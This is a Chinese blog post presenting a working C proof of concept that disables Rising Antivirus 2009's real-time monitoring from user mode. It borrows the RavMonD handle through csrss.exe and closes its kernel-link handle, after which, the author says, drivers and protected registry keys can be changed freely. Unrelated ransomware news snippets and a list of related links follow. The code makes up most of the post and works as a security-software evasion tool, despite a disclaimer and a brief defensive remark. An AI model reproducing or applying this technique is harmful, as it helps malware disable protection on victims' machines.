用户层关闭瑞星2009杀毒软件安全保护
我写这个纯粹是hacker精神,如果被滥用做病毒木马一类的邋遢东东,可跟偶没关系哦。
原理very简单,我发现瑞星监控主要在RavMonD进程中,如果打破其与内核的联系,则
瑞星监控功能就无法正常工作了,怎么打破联系呢?如果是进内核的话当然有很多的办法,
从而没有挑战性了,况且RavMonD会阻止用户进程去加载驱动或者动注册表的关键地方,
比如run子键。下面上测试代码:
int main(int argc,char *argv[])
{
if(argc != 4)
puts("usage ccon csrss.pid prmd.handle hooksys.handle");
else
{
int pid = atoi(argv[1]);
int hprmd = atoi(argv[2]);
int hobj = atoi(argv[3]);
if(!SetDebugPrivilege(true))
puts("SetDebugPrivilege Failed!");
HANDLE hcs = OpenProcess(PROCESS_ALL_ACCESS,false,pid);
if(!hcs)
{
puts("Open Csrss.exe Failed");
PrintErr(GetLastError());
}
else //直接打开RavMonD进程会失败的,so采用迂回战术
{
HANDLE hprmd_loc;
if(!DuplicateHandle(hcs,(HANDLE)hprmd,GetCurrentProcess(),/
hprmd_loc,PROCESS_ALL_ACCESS,false,0))
{
puts("Get hprmd_loc Failed!");
PrintErr(GetLastError());
}
else //关闭hooksys的句柄,打破其与内核的联系
{
HANDLE hobj_loc;
if(!DuplicateHandle(hprmd_loc,(HANDLE)hobj,/
GetCurrentProcess(), hobj_loc,0,false,/
DUPLICATE_CLOSE_SOURCE | DUPLICATE_SAME_ACCESS))
{
puts("Get hobj_loc Failed!");
PrintErr(GetLastError());
}
else
{
if(!CloseHandle(hobj_loc))
{
puts("Close hobj_loc Failed");
}
else
puts("We Success Finally!!!");
}
}
}
}
return 0;
}
打破瑞星监控与内核的关联之后,用户进程可以任意加载驱动程序进内核或者篡改注册表
中的关键内容,我测试了一下,虽然第一次修改注册表中的监控内容时瑞星还是会提示用
户是否允许修改,但是这时即使选择否,同样可以修改成功,而且以后的修改瑞星不会再
提示了。
其实防守起来也很容易,瑞星只要不让我们在ring3下取到hooksys的句柄就行了,当然
仍然防不住内核中的攻击,进入ring0还是可以为所欲为。
我的测试环境 windows xp sp3 + 瑞星杀毒2009 21.49.14 测试成功
新型MacOS勒索软件:正在伪装成PS软件传播 本文讲的是新型MacOS勒索软件:正在伪装成PS软件传播,几天前, ESET公司的安全专家发现了一种新型的MacOS勒索软件,属于非常珍贵的物种。这一勒索软件被命名为OSX/Filecoder.E,主要是通过bittorrent网站攻击MacOS用户。
无需连接命令控制服务器的Spora 有可能成为勒索软件之王 本文讲的是无需连接命令控制服务器的Spora 有可能成为勒索软件之王,安全研究人员发现了一种新式勒索软件,该软件被命名为Spora,能够进行强离线文件解密,赎金支付模式也有了许多创新。
相关文章
- 倍福TwinCAT(贝福Beckhoff)基础教程 松下驱动器试运行提示过速度保护怎么办
- 【阿里云资讯】阿里云首席安全研究员吴翰清解读:如何保护“互联网心脏”DNS
- [破解] DRM-内容数据版权加密保护技术学习(中):License预发放实现
- [破解] DRM-内容数据版权加密保护技术学习(上):视频文件打包实现
- 机器学习笔记 - Kaggle竞赛 帮助保护大堡礁,棘冠海星目标检测参赛经历
- 【反传销】传销故事总结—如何尽可能保护自身和家人安全
- Atitit uke plnsy安全隐私保护法案 目录 第一章 一般规定2 第1节 主题与目标2 第二章 常见安全原则3 第1节 隔离 保密 shell3 第2节 隐藏 保密 不出头3
- 高级端点保护 (AEP) 简介
- Mac OS X El Capitan系统完整性保护System Integrity Protection (SIP)
- 保护客户代码和应用安全,CodeArts有7招
- 多方安全计算:隐私保护集合求交技术
- CWE 4.3:强化你的数据自我保护能力
- 华为运营商级路由器配置示例 | L3VdPdNdv4 over SRv6 TE Policy尾节点保护
- 主机安全——主机上的病毒检测、漏洞防护,权限管理。目标是保护主机的数据存储和计算安全
- 阿里云 防止网站敏感信息(个人的如身份证号手机号、服务器的如版本信息、他人的信息如越权查看)泄漏——通过规则匹配做 避免身份证、银行卡、电话号码等敏感数据泄露;针对服务器返回的异常页面或关键字做信息保护。
- 电路方案分析(八)Type-C 端口短路保护参考设计
- 如何保护您的SpringBoot项目:防止源代码泄露,确保更安全的部署
- HTTP与HTTPS:保护您的在线安全和隐私的关键差异
- 解决“你的许可证不是正版,并且你可能是盗版软件的受害者。使用正版Office,避免干扰并保护你的文件安全。”